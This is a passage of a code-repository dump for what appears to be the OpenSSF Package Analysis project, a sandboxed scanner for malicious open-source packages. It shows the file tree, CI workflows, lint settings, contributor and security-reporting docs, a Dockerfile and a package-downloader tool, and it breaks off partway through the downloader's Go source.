├── .dockerignore ├── .github ├── dependabot.yml └── workflows │ ├── build-images.yml │ ├── build.yml │ ├── codeql-analysis.yml │ ├── depsreview.yml │ ├── osv-scanner-pr.yml │ ├── osv-scanner-scheduled.yml │ ├── scorecards-analysis.yml │ ├── shellcheck.yml │ └── test.yml ├── .gitignore ├── .golangci.yml ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── Makefile ├── README.md ├── SECURITY.md ├── cmd ├── analyze │ ├── Dockerfile │ └── main.go ├── downloader │ ├── README.md │ └── main.go ├── scheduler │ ├── Dockerfile │ ├── README.md │ ├── config │ │ └── deployment.yaml │ ├── main.go │ └── proxy │ │ └── proxy.go └── worker │ ├── config.go │ ├── main.go │ └── pubsubextender │ ├── extender.go │ ├── extender_test.go │ ├── gcpdriver.go │ ├── gcpdriver_test.go │ └── noopdriver.go ├── configs └── e2e │ ├── .gitignore │ ├── config │ └── feeds.yml │ └── docker-compose.yml ├── docs ├── case_studies.md ├── data_schema.md ├── images │ ├── Pipeline diagram.png │ ├── npm_depconf-typosquat_1.png │ ├── npm_random_vouchercode-generator_1.png │ ├── npm_random_vouchercode-generator_2.png │ ├── npm_roku_web_core-ajax_1.png │ ├── pypi_discordcmd_1.png │ ├── pypi_discordcmd_2.png │ └── pypi_secrevthree_1.png └── queries.md ├── examples ├── README.md ├── custom-sandbox │ ├── Dockerfile │ ├── Makefile │ ├── README.md │ └── analyze.php └── e2e │ └── README.md ├── function └── loader │ ├── README.md │ ├── dynamic-analysis-schema.json │ ├── go.mod │ ├── go.sum │ ├── load.go │ └── static-analysis-schema.json ├── go.mod ├── go.sum ├── infra ├── README.md ├── cloudbuild │ ├── dynamic_loader │ │ └── cloudbuild.yaml │ └── image_build │ │ └── cloudbuild.yaml ├── terraform │ ├── analysis.tf │ ├── build │ │ ├── main.tf │ │ └── variables.tf │ ├── docker_registry │ │ ├── main.tf │ │ └── variables.tf │ ├── metrics │ │ ├── log_metrics.tf │ │ └── variables.tf │ ├── terraform.tfvars │ └── variables.tf └── worker │ ├── scaler.yaml │ └── workers-set.yaml ├── internal ├── analysis │ ├── mode.go │ └── 
status.go ├── dnsanalyzer │ └── dnsanalyzer.go ├── dynamicanalysis │ ├── analysis.go │ └── sandbox_args.go ├── featureflags │ ├── featureflags.go │ ├── featureflags_test.go │ └── features.go ├── log │ ├── context.go │ ├── context_test.go │ ├── log.go │ ├── log_test.go │ ├── writer.go │ └── writer_test.go ├── notification │ └── notification.go ├── packetcapture │ └── packetcapture.go ├── pkgmanager │ ├── crates.io.go │ ├── download.go │ ├── download_test.go │ ├── ecosystem.go │ ├── npm.go │ ├── package.go │ ├── packagist.go │ ├── pypi.go │ └── rubygems.go ├── resultstore │ ├── result.go │ ├── resultstore.go │ └── resultstore_test.go ├── sandbox │ ├── copy_args.go │ ├── copy_args_test.go │ ├── init.go │ └── sandbox.go ├── staticanalysis │ ├── analyze.go │ ├── analyze_test.go │ ├── basicdata │ │ ├── basic_data.go │ │ ├── basic_data_test.go │ │ └── describe_files.go │ ├── externalcmd │ │ ├── input_strategy.go │ │ └── input_strategy_test.go │ ├── linelengths │ │ ├── line_lengths.go │ │ └── line_lengths_test.go │ ├── parsing │ │ ├── analyze.go │ │ ├── analyze_test.go │ │ ├── babel-parser.js │ │ ├── init_parser.go │ │ ├── js_parsing.go │ │ ├── js_parsing_test.go │ │ ├── package-lock.json │ │ ├── package.json │ │ ├── parsing_types.go │ │ ├── result.go │ │ └── string_regexp.go │ ├── result.go │ ├── result_test.go │ ├── signals │ │ ├── analyze.go │ │ ├── detections │ │ │ ├── addresses.go │ │ │ ├── addresses_test.go │ │ │ ├── base64.go │ │ │ ├── base64_test.go │ │ │ ├── escape_sequences.go │ │ │ ├── escape_sequences_test.go │ │ │ ├── hex_strings.go │ │ │ ├── hex_strings_test.go │ │ │ └── suspicious_identifiers.go │ │ ├── file_signals.go │ │ ├── file_signals_test.go │ │ ├── stats │ │ │ ├── sample_statistics.go │ │ │ └── sample_statistics_test.go │ │ └── stringentropy │ │ │ ├── string_entropy.go │ │ │ └── string_entropy_test.go │ └── task.go ├── strace │ ├── strace.go │ └── strace_test.go ├── useragent │ ├── useragent.go │ └── useragent_test.go ├── utils │ ├── 
archive_extract.go │ ├── archive_extract_test.go │ ├── combine_regexp.go │ ├── combine_regexp_test.go │ ├── comma_separated_flags.go │ ├── equals.go │ ├── file_write_data_utils.go │ ├── hash_file.go │ ├── hash_file_test.go │ ├── last_bytes.go │ ├── last_bytes_test.go │ ├── remove_duplicates.go │ ├── transform.go │ └── write_file.go └── worker │ ├── code_execution.go │ ├── logging.go │ ├── resolvepackage.go │ ├── rundynamic.go │ ├── runstatic.go │ ├── sandbox_options.go │ ├── save_data.go │ └── savefilewriteresults.go ├── osv-scanner.toml ├── pkg ├── api │ ├── analysisrun │ │ ├── key.go │ │ ├── key_test.go │ │ ├── phase.go │ │ └── result.go │ ├── notification │ │ └── notification.go │ ├── pkgecosystem │ │ ├── ecosystem.go │ │ └── ecosystem_test.go │ └── staticanalysis │ │ ├── record.go │ │ ├── signals.go │ │ └── token │ │ ├── identifier_type.go │ │ ├── position.go │ │ └── tokens.go └── valuecounts │ ├── value_counts.go │ └── value_counts_test.go ├── sample_packages ├── Makefile ├── README.md └── sample_python_package │ ├── Dockerfile │ ├── pyproject.toml │ ├── setup.py │ └── src │ ├── __init__.py │ └── example.py ├── sandboxes ├── README.md ├── dynamicanalysis │ ├── Dockerfile │ ├── analyze-node.js │ ├── analyze-php.php │ ├── analyze-python.py │ ├── analyze-ruby.rb │ ├── analyze-rust.py │ ├── bowerrc │ └── pypi-packages.txt └── staticanalysis │ ├── Dockerfile │ └── staticanalyze.go ├── scripts ├── analyse-tarballs.sh ├── bq_load.sh ├── deploy.sh ├── format-static-analysis-json.py └── run_analysis.sh ├── test └── e2e │ ├── README.md │ └── docker-compose.test.yml └── tools ├── README.md ├── analysis ├── README.md ├── analysis_runner.py ├── backfill.sh ├── node.txt ├── python.txt └── rubygems.txt ├── gvisor ├── README.md └── runsc_compat.sh └── network ├── iptables.rules └── podman-analysis.conflist /.dockerignore: -------------------------------------------------------------------------------- 1 | # What to ignore while building Go based cmd container images. 
2 | # This helps make the images build a lot faster. 3 | build 4 | infra 5 | examples 6 | function/loader/** 7 | sandboxes 8 | internal/staticanalysis/parsing/js/node_modules 9 | node_modules 10 | web 11 | 12 | # Docker builds the static analysis sandbox image in 13 | # the top-level project directory, so needs to copy 14 | # from this subdirectory during the build 15 | !sandboxes/staticanalysis 16 | 17 | # Don't ignore any go mod or sum files; go build needs them 18 | # Note: this rule won't work if the parent directory of a 19 | # go.mod or go.sum file is excluded 20 | !**/go.mod 21 | !**/go.sum 22 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "gomod" 4 | directory: "/" 5 | schedule: 6 | interval: "monthly" 7 | open-pull-requests-limit: 10 8 | groups: 9 | gomod-minor-updates: 10 | update-types: 11 | - "minor" 12 | - "patch" 13 | - package-ecosystem: "gomod" 14 | directory: "/function/loader" 15 | schedule: 16 | interval: "monthly" 17 | open-pull-requests-limit: 10 18 | groups: 19 | loader-minor-updates: 20 | update-types: 21 | - "minor" 22 | - "patch" 23 | - package-ecosystem: "github-actions" 24 | directory: "/" 25 | schedule: 26 | interval: "monthly" 27 | groups: 28 | actions-minor-updates: 29 | update-types: 30 | - "minor" 31 | - "patch" 32 | - package-ecosystem: "npm" 33 | directory: "/internal/staticanalysis/parsing" 34 | schedule: 35 | interval: "monthly" 36 | groups: 37 | parsing-minor-updates: 38 | update-types: 39 | - "minor" 40 | - "patch" 41 | -------------------------------------------------------------------------------- /.github/workflows/build-images.yml: -------------------------------------------------------------------------------- 1 | name: "Build docker" 2 | 3 | on: 4 | pull_request: 5 | 6 | push: 7 | paths-ignore: 8 | - '**.md' 9 | 10 | permissions: 
read-all 11 | 12 | jobs: 13 | build_docker: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 18 | 19 | - name: setup-go 20 | uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 21 | with: 22 | go-version-file: 'go.mod' 23 | 24 | - name: Enable docker experimental 25 | run: | 26 | echo $'{"experimental": true}' | sudo dd status=none of=/etc/docker/daemon.json 27 | sudo service docker restart 28 | docker version -f '{{.Server.Experimental}}' 29 | 30 | - name: build_docker 31 | run: make build 32 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: "Build" 2 | 3 | on: 4 | pull_request: 5 | 6 | permissions: read-all 7 | 8 | jobs: 9 | Build: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 13 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 14 | with: 15 | go-version-file: 'go.mod' 16 | - name: Install libpcap-dev 17 | run: sudo apt-get install -y libpcap-dev 18 | - run: go build -o scheduler ./cmd/scheduler 19 | - run: go build -o worker ./cmd/worker 20 | - run: go build -o analyze ./cmd/analyze 21 | - run: go build -o loader load.go 22 | working-directory: function/loader 23 | - run: go build -o staticanalyze staticanalyze.go 24 | working-directory: sandboxes/staticanalysis 25 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed 2 | name: "CodeQL" 3 | 4 | on: 5 | push: 6 | branches: 
[ main ] 7 | paths-ignore: 8 | - '**.md' 9 | pull_request: 10 | # The branches below must be a subset of the branches above 11 | branches: [ main ] 12 | paths-ignore: 13 | - '**.md' 14 | schedule: 15 | - cron: '22 19 * * 0' 16 | 17 | permissions: read-all 18 | 19 | jobs: 20 | analyze: 21 | name: Analyze 22 | runs-on: ubuntu-latest 23 | permissions: 24 | security-events: write 25 | actions: read 26 | contents: read 27 | 28 | strategy: 29 | fail-fast: false 30 | matrix: 31 | language: [ 'go' ] 32 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ] 33 | # Learn more: 34 | 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 38 | 39 | - name: setup-go 40 | uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 41 | with: 42 | go-version-file: 'go.mod' 43 | 44 | # Initializes the CodeQL tools for scanning. 45 | - name: Initialize CodeQL 46 | uses: github/codeql-action/init@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 47 | with: 48 | languages: ${{ matrix.language }} 49 | 50 | - name: Autobuild 51 | uses: github/codeql-action/autobuild@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 52 | 53 | - name: Perform CodeQL Analysis 54 | uses: github/codeql-action/analyze@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 55 | -------------------------------------------------------------------------------- /.github/workflows/depsreview.yml: -------------------------------------------------------------------------------- 1 | name: 'Dependency Review' 2 | 3 | on: 4 | pull_request: 5 | paths-ignore: 6 | - '**.md' 7 | 8 | permissions: 9 | contents: read 10 | 11 | jobs: 12 | dependency-review: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: 'Checkout Repository' 16 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 17 | - name: 'Dependency Review' 18 | uses: actions/dependency-review-action@3b139cfc5fae8b618d3eae3675e383bb1769c019 # 
v4.5.0 19 | -------------------------------------------------------------------------------- /.github/workflows/osv-scanner-pr.yml: -------------------------------------------------------------------------------- 1 | name: OSV-Scanner PR Scan 2 | 3 | # Change "main" to your default branch if you use a different name, i.e. "master" 4 | on: 5 | pull_request: 6 | branches: [ main ] 7 | merge_group: 8 | branches: [ main ] 9 | 10 | # Declare default permissions as read only. 11 | permissions: 12 | actions: read 13 | contents: read 14 | # Require writing security events to upload SARIF file to security tab 15 | security-events: write 16 | 17 | jobs: 18 | scan-pr: 19 | uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v1.9.2" 20 | -------------------------------------------------------------------------------- /.github/workflows/osv-scanner-scheduled.yml: -------------------------------------------------------------------------------- 1 | name: OSV-Scanner Scheduled Scan 2 | 3 | on: 4 | schedule: 5 | - cron: '50 1 * * 6' # run at 01:50 UTC every Saturday 6 | # Change "main" to your default branch if you use a different name, i.e. "master" 7 | push: 8 | branches: [ main ] 9 | 10 | permissions: 11 | actions: read 12 | contents: read 13 | # Require writing security events to upload SARIF file to security tab 14 | security-events: write 15 | 16 | jobs: 17 | scan-scheduled: 18 | uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v1.9.2" 19 | -------------------------------------------------------------------------------- /.github/workflows/scorecards-analysis.yml: -------------------------------------------------------------------------------- 1 | name: Scorecards supply-chain security 2 | on: 3 | # Only the default branch is supported. 4 | branch_protection_rule: 5 | schedule: 6 | - cron: '21 11 * * 0' 7 | push: 8 | branches: [ main ] 9 | paths-ignore: 10 | - '**.md' 11 | 12 | # Declare default permissions as read only. 
13 | permissions: read-all 14 | 15 | jobs: 16 | analysis: 17 | name: Scorecards analysis 18 | runs-on: ubuntu-latest 19 | permissions: 20 | # Needed to upload the results to code-scanning dashboard. 21 | security-events: write 22 | actions: read 23 | contents: read 24 | id-token: write 25 | 26 | steps: 27 | - name: "Checkout code" 28 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 29 | with: 30 | persist-credentials: false 31 | 32 | - name: "Run analysis" 33 | uses: ossf/scorecard-action@62b2cac7ed8198b15735ed49ab1e5cf35480ba46 # v2.4.0 34 | with: 35 | results_file: results.sarif 36 | results_format: sarif 37 | repo_token: ${{ secrets.GITHUB_TOKEN }} 38 | # Publish the results for public repositories to enable scorecard badges. For more details, see 39 | # https://github.com/ossf/scorecard-action#publishing-results. 40 | # For private repositories, `publish_results` will automatically be set to `false`, regardless 41 | # of the value entered here. 42 | publish_results: true 43 | 44 | # Upload the results as artifacts (optional). 45 | - name: "Upload artifact" 46 | uses: actions/upload-artifact@65c4c4a1ddee5b72f698fdd19549f0f0fb45cf08 # v4.6.0 47 | with: 48 | name: SARIF file 49 | path: results.sarif 50 | retention-days: 5 51 | 52 | # Upload the results to GitHub's code scanning dashboard. 
53 | - name: "Upload to code-scanning" 54 | uses: github/codeql-action/upload-sarif@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1 55 | with: 56 | sarif_file: results.sarif 57 | -------------------------------------------------------------------------------- /.github/workflows/shellcheck.yml: -------------------------------------------------------------------------------- 1 | 2 | name: 'Shellcheck' 3 | 4 | on: 5 | push: 6 | paths: 7 | - '**.sh' 8 | 9 | pull_request: 10 | paths: 11 | - '**.sh' 12 | 13 | permissions: 14 | contents: read 15 | 16 | jobs: 17 | check-scripts: 18 | runs-on: ubuntu-latest 19 | steps: 20 | - name: 'Checkout Repository' 21 | uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 22 | - name: 'Check scripts in all directories' 23 | run: make check_scripts 24 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: "Test" 2 | 3 | on: 4 | pull_request: 5 | paths-ignore: 6 | - '**.md' 7 | 8 | permissions: read-all 9 | 10 | jobs: 11 | run-tests: 12 | runs-on: ubuntu-latest 13 | steps: 14 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 15 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 16 | with: 17 | go-version-file: 'go.mod' 18 | - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0 19 | with: 20 | node-version: 18 21 | - name: Install libpcap-dev 22 | run: sudo apt-get install -y libpcap-dev 23 | - name: Run tests 24 | run: go test -v -skip "TestDownload/crates.io_rand_valid_version" ./... 
25 | run-linter: 26 | runs-on: ubuntu-latest 27 | steps: 28 | - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 29 | - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 30 | with: 31 | go-version-file: 'go.mod' 32 | - name: golangci-lint 33 | uses: golangci/golangci-lint-action@971e284b6050e8a5849b72094c50ab08da042db8 # v6.1.1 34 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | .terraform* 18 | *.tfstate 19 | 20 | # node_modules folders containing JS dependencies 21 | # these should be pre-installed where needed 22 | node_modules/ 23 | 24 | -------------------------------------------------------------------------------- /.golangci.yml: -------------------------------------------------------------------------------- 1 | --- 2 | run: 3 | concurrency: 6 4 | timeout: 5m 5 | issues: 6 | # Maximum issues count per one linter. 7 | # Set to 0 to disable. 8 | # Default: 50 9 | max-issues-per-linter: 0 10 | # Maximum count of issues with the same text. 11 | # Set to 0 to disable. 
12 | # Default: 3 13 | max-same-issues: 0 14 | # Exclude previously existing issues from the report 15 | new: true 16 | new-from-rev: HEAD 17 | linters: 18 | disable-all: true 19 | enable: 20 | - asciicheck 21 | - bodyclose 22 | - copyloopvar 23 | - depguard 24 | - dogsled 25 | - errcheck 26 | - errorlint 27 | - exhaustive 28 | - gci 29 | #- gochecknoinits 30 | - gocognit 31 | - goconst 32 | - gocritic 33 | - gocyclo 34 | - godot 35 | - godox 36 | #- goerr113 37 | - gofmt 38 | - gofumpt 39 | - goheader 40 | - goimports 41 | - gomodguard 42 | - goprintffuncname 43 | - gosec 44 | - gosimple 45 | #- govet 46 | - ineffassign 47 | #- lll 48 | - makezero 49 | - misspell 50 | - nakedret 51 | - nestif 52 | - noctx 53 | - nolintlint 54 | #- paralleltest 55 | - predeclared 56 | - staticcheck 57 | - stylecheck 58 | - thelper 59 | - tparallel 60 | - typecheck 61 | - unconvert 62 | - unparam 63 | - unused 64 | - whitespace 65 | - wrapcheck 66 | linters-settings: 67 | errcheck: 68 | check-type-assertions: true 69 | check-blank: true 70 | exhaustive: 71 | # https://golangci-lint.run/usage/linters/#exhaustive 72 | default-signifies-exhaustive: true 73 | govet: 74 | enable: 75 | - fieldalignment 76 | godox: 77 | keywords: 78 | - BUG 79 | - FIXME 80 | - HACK 81 | gci: 82 | sections: 83 | - standard 84 | - default 85 | - prefix(github.com/ossf/package-analysis) 86 | gocritic: 87 | enabled-checks: 88 | # Diagnostic 89 | - appendAssign 90 | - badCond 91 | - caseOrder 92 | - codegenComment 93 | - commentedOutCode 94 | - deprecatedComment 95 | - dupBranchBody 96 | - dupCase 97 | - dupSubExpr 98 | - exitAfterDefer 99 | - flagName 100 | - nilValReturn 101 | - weakCond 102 | - octalLiteral 103 | 104 | # Performance 105 | - appendCombine 106 | #- hugeParam 107 | - rangeExprCopy 108 | - rangeValCopy 109 | 110 | # Style 111 | - boolExprSimplify 112 | - captLocal 113 | - commentFormatting 114 | - commentedOutImport 115 | - defaultCaseOrder 116 | - docStub 117 | - elseif 118 | - emptyFallthrough 
119 | - hexLiteral 120 | - ifElseChain 121 | - methodExprCall 122 | - singleCaseSwitch 123 | - typeAssertChain 124 | - typeSwitchVar 125 | - underef 126 | - unlabelStmt 127 | - unlambda 128 | 129 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to Package Analysis 2 | 3 | Hello new contributor! Thank you for contributing your time and expertise to the Package Analysis project. 4 | We're delighted to have you on board. 5 | 6 | This document describes the contribution guidelines for the project. 7 | 8 | ## Ways to get in touch 9 | 10 | If you have any contribution-related questions, please get in touch! Here are some ways to reach current contributors 11 | 1. Open a new issue (strongly preferred) 12 | 1. Via the [OpenSSF Securing Critical Projects Working Group](https://github.com/ossf/wg-securing-critical-projects) mailing list or Slack channel 13 | 14 | Note: for minor changes (typos, documentation improvements), feel free to open a pull request directly. 15 | 16 | **Note:** Before you start contributing, you must read and abide by our 17 | **[Code of Conduct](./CODE_OF_CONDUCT.md)**. 18 | 19 | ## Contributing code 20 | 21 | ### Getting started 22 | 23 | 1. Create [a GitHub account](https://github.com/join) 24 | 1. Set up your [development environment](#environment-setup) 25 | 26 | ## Environment Setup 27 | 28 | You must install these tools: 29 | 30 | 1. [`git`](https://help.github.com/articles/set-up-git/): For source control. 31 | 1. [`go`](https://go.dev/dl/): For running code. 32 | 1. `make`: For running development commands 33 | 34 | For running/testing locally, the following additional tools are required: 35 | 36 | 1. [`docker`](https://www.docker.com/get-started/): The external container 37 | 1. [`podman`](https://podman.io/getting-started/): The internal container 38 | 1. 
[`docker-compose`](https://docs.docker.com/compose/install/) for end-to-end testing 39 | 40 | Then clone the repository, e.g: 41 | 42 | ```shell 43 | $ git clone git@github.com:ossf/package-analysis.git 44 | $ cd package-analysis 45 | ``` 46 | 47 | ## Notes on style 48 | 49 | ### Commit style 50 | 51 | Prefer smaller PRs to make reviewing easier. Larger changes can be split into smaller PRs by branching off previous (unmerged) branches rather than main. 52 | 53 | ### Code style 54 | 55 | We generally follow the [Google Go Style Guide](https://google.github.io/styleguide/go/index). 56 | 57 | #### Warnings 58 | 59 | Some things that are OK: 60 | 61 | - not handling the error when `defer` close() on an HTTP response body 62 | 63 | #### Comments 64 | 65 | Follow official Go comment style: https://tip.golang.org/doc/comment. 66 | In particular, all exported (capitalised) types and functions should have a comment explaining what they do. 67 | The comment should start with the type/function name. 68 | 69 | #### Imports 70 | 71 | - stdlib imports grouped first, then 3rd party packages, then local imports 72 | - each group separated by a blank line and ordered alphabetically 73 | 74 | ##### on IntelliJ 75 | 76 | - Remove redundant import aliases: yes 77 | - Sorting type: gofmt 78 | - Move all imports into a single declaration: yes 79 | - Group stdlib imports: yes 80 | - Move all stdlib imports in a single group: yes 81 | - Group: yes, current project packages 82 | 83 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Reporting Security Issues 2 | 3 | To report a security issue, please email 4 | [oss-security@googlegroups.com](mailto:oss-security@googlegroups.com) 5 | with a description of the issue, the steps you took to create the issue, 6 | affected versions, and, if known, mitigations for the issue. 
7 | 8 | Our vulnerability management team will respond within 3 working days of your 9 | email. If the issue is confirmed as a vulnerability, we will open a 10 | Security Advisory and acknowledge your contributions as part of it. This project 11 | follows a 90 day disclosure timeline. 12 | 13 | Additionally, vulnerabilities can be reported to repository maintainers 14 | [here on Github](https://github.com/ossf/package-analysis/security/advisories/new). 15 | -------------------------------------------------------------------------------- /cmd/analyze/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | RUN apt-get update && apt-get install -y libpcap-dev 3 | WORKDIR /src 4 | 5 | # First cache the dependencies to avoid downloading again on code change 6 | COPY ./go.mod ./ 7 | COPY ./go.sum ./ 8 | RUN go mod download 9 | 10 | COPY . ./ 11 | RUN go build -o analyze ./cmd/analyze && go build -o worker ./cmd/worker 12 | 13 | FROM ubuntu:22.04@sha256:42ba2dfce475de1113d55602d40af18415897167d47c2045ec7b6d9746ff148f 14 | 15 | ENV DEBIAN_FRONTEND noninteractive 16 | RUN apt-get update && apt-get upgrade -y && \ 17 | apt-get install -y \ 18 | apt-transport-https \ 19 | ca-certificates \ 20 | curl \ 21 | iptables \ 22 | iproute2 \ 23 | podman \ 24 | software-properties-common && \ 25 | update-alternatives --set iptables /usr/sbin/iptables-legacy && \ 26 | update-alternatives --set ip6tables /usr/sbin/ip6tables-legacy 27 | 28 | # Install gVisor. 
29 | RUN mkdir -m 0700 -p /etc/apt/keyrings && \ 30 | curl -fsSL https://gvisor.dev/archive.key -o /etc/apt/keyrings/gvisor.key && \ 31 | echo "deb [signed-by=/etc/apt/keyrings/gvisor.key] https://storage.googleapis.com/gvisor/releases 20240212 main" > /etc/apt/sources.list.d/gvisor.list && \ 32 | apt-get update && apt-get install -y runsc 33 | 34 | COPY --from=build /src/analyze /usr/local/bin/analyze 35 | COPY --from=build /src/worker /usr/local/bin/worker 36 | COPY --from=build /src/tools/gvisor/runsc_compat.sh /usr/local/bin/runsc_compat.sh 37 | COPY --from=build /src/tools/network/iptables.rules /usr/local/etc/iptables.rules 38 | COPY --from=build /src/tools/network/podman-analysis.conflist /etc/cni/net.d/podman-analysis.conflist 39 | RUN chmod 755 /usr/local/bin/runsc_compat.sh && \ 40 | chmod 644 /usr/local/etc/iptables.rules /etc/cni/net.d/podman-analysis.conflist 41 | 42 | ARG SANDBOX_IMAGE_TAG 43 | ENV OSSF_SANDBOX_IMAGE_TAG=${SANDBOX_IMAGE_TAG} 44 | -------------------------------------------------------------------------------- /cmd/downloader/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Package Download tool 3 | 4 | This tool enables easy batch download of many packages to a local directory, 5 | which may be useful for testing or running analysis locally. 6 | 7 | ## Building 8 | 9 | ```bash 10 | go build -o downloader main.go 11 | ``` 12 | 13 | ## Running 14 | 15 | ```bash 16 | ./downloader -f -d 17 | ``` 18 | 19 | There are two options to the downloader tool: 20 | 21 | 1. List of packages to download (mandatory) 22 | 2. Destination directory to download to (optional) 23 | 24 | If `-d` is not specified, packages will be downloaded to the current directory. 25 | 26 | The file containing the list of packages to download must have the following structure: 27 | 28 | 1. 
Each line of the file specifies one package to download in 29 | [Package URL](https://github.com/package-url/purl-spec) format 30 | 2. Package ecosystem and name are required, version is optional 31 | 3. If the version is not given, the latest version is downloaded 32 | 33 | Here are some examples of Package URLs (purls): 34 | 35 | - `pkg:npm/async`: NPM package `async`, no version specified 36 | - `pkg:pypi/requests@2.31.0`: PyPI package `requests`, version 2.31.0 37 | - `pkg:npm/%40babel/runtime`: NPM package `@babel/runtime` (note: percent encoding is not required by this tool) 38 | 39 | If Package URL is invalid or a package fails to download, the error will be printed but will not stop the program; 40 | remaining package downloads will still be attempted. -------------------------------------------------------------------------------- /cmd/downloader/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "errors" 6 | "flag" 7 | "fmt" 8 | "net/http" 9 | "os" 10 | "strings" 11 | 12 | "github.com/package-url/packageurl-go" 13 | 14 | "github.com/ossf/package-analysis/internal/useragent" 15 | "github.com/ossf/package-analysis/internal/worker" 16 | ) 17 | 18 | // Command-line tool to download a list of package archives, specified by purl 19 | // See https://github.com/package-url/purl-spec 20 | var ( 21 | purlFilePath = flag.String("f", "", "file containing list of package URLs") 22 | downloadDir = flag.String("d", "", "directory to store downloaded tarballs") 23 | ) 24 | 25 | // cmdError is a simple string error type, used when command usage 26 | // should be printed alongside the actual error message 27 | type cmdError struct { 28 | message string 29 | } 30 | 31 | func (c *cmdError) Error() string { 32 | return c.message 33 | } 34 | 35 | func newCmdError(message string) error { 36 | return &cmdError{message} 37 | } 38 | 39 | func downloadPackage(purl packageurl.PackageURL, dir 
string) error { 40 | pkg, err := worker.ResolvePurl(purl) 41 | if err != nil { 42 | return err 43 | } 44 | 45 | fmt.Printf("[%s] %s@%s", pkg.EcosystemName(), pkg.Name(), pkg.Version()) 46 | 47 | if downloadPath, err := pkg.Manager().DownloadArchive(pkg.Name(), pkg.Version(), dir); err != nil { 48 | fmt.Println() 49 | return err 50 | } else { 51 | fmt.Printf(" -> %s\n", downloadPath) 52 | } 53 | 54 | return nil 55 | } 56 | 57 | func checkDirectoryExists(path string) error { 58 | stat, err := os.Stat(path) 59 | 60 | if err != nil && errors.Is(err, os.ErrNotExist) { 61 | return fmt.Errorf("path %s does not exist", path) 62 | } 63 | if err != nil { 64 | return fmt.Errorf("could not stat %s: %w", path, err) 65 | } 66 | if !stat.IsDir() { 67 | return fmt.Errorf("%s is not a directory", path) 68 | } 69 | 70 | return nil 71 | } 72 | 73 | func processFileLine(text string) error { 74 | trimmed := strings.TrimSpace(text) 75 | if len(trimmed) == 0 || trimmed[0] == '#' { 76 | return nil 77 | } 78 | 79 | if purl, err := packageurl.FromString(trimmed); err != nil { 80 | return fmt.Errorf("invalid purl '%s': %w", text, err) 81 | } else if err := downloadPackage(purl, *downloadDir); err != nil { 82 | return fmt.Errorf("could not download %s: %w", text, err) 83 | } 84 | 85 | return nil 86 | } 87 | 88 | func run() error { 89 | flag.Parse() 90 | 91 | http.DefaultTransport = useragent.DefaultRoundTripper(http.DefaultTransport, "") 92 | 93 | if *purlFilePath == "" { 94 | return newCmdError("Please specify packages to download using -f ") 95 | } 96 | if *downloadDir == "" { 97 | *downloadDir = "." 
